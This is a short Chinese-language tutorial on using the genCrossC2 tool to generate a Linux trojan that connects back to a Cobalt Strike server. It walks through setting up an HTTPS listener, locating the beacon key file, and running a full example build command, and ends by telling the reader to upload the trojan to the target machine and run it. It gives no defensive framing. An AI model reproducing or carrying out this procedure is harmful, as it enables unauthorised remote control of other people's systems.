这里介绍一个cobaltstrike-linux 上线的工具genCrossC2
我们要通过这个工具生成一个linux的木马,用于cobaltstrike的统一管理
注意事项
首先要注意一点,CrossC2暂时只支持到cobaltstrike3.14版本,4版本因为协议的问题,可以上线但不能执行命令(现已支持4.1版本)。两种版本的配置过程是一样的。
准备环境如下:
第一步:我们要先将cobaltstrike的监听器打开,CrossC2暂时只支持HTTPS的监听器
这里要注意创建完这个监听器后在你的cobaltstrike的根目录下面会生成一个的隐藏文件
第二步:
在https://github.com/gloxec/CrossC2 上面下载这个工具,解压放到cobaltstrike的根目录下面
将这个隐藏文件复制到 CrossC2/src 下面(不放也行只要记得路径就可以)
第三步:生成木马
./genCrossC2.Linux 【cobaltstrike地址】【https的端口】 【秘钥文件】null Linux x64【输出路径】
例子:./genCrossC2.Linux 192.168.1.1 443 cobaltstrike.beacon_keys null Linux x64 /tmp/linux.cs
到此为止我们的木马就生成完了,只需要将这个木马上传到目标机执行即可。